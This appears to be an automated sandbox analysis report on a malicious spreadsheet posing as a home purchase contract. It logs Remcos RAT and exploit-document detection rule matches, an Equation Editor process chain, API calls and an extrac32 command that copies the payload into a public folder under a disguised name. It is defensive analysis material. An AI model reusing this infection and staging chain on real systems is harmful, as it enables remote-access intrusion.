                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winXLS@9/31@13/6
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_33D57952
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C77F4C GetDiskFreeSpaceA,11_2_02C77F4C
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,8_2_33D4F8FD
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C86D40 CoCreateInstance,11_2_02C86D40
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_33D5B4A8
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,8_2_33D5AB0D
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UZ61X6P3.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-9VASLD
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR70AC.tmpJump to behavior
                  Source: Home Purchase Contract and Property Details.xlsOLE indicator, Workbook stream: true
                  Source: 0B430000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF
                  Source: unknownProcess created: C:\Users\Public\Libraries\Efftwcmk.PIF "C:\Users\Public\Libraries\Efftwcmk.PIF"
                  Source: unknownProcess created: C:\Users\Public\Libraries\Efftwcmk.PIF "C:\Users\Public\Libraries\Efftwcmk.PIF"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIFJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????s?s.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
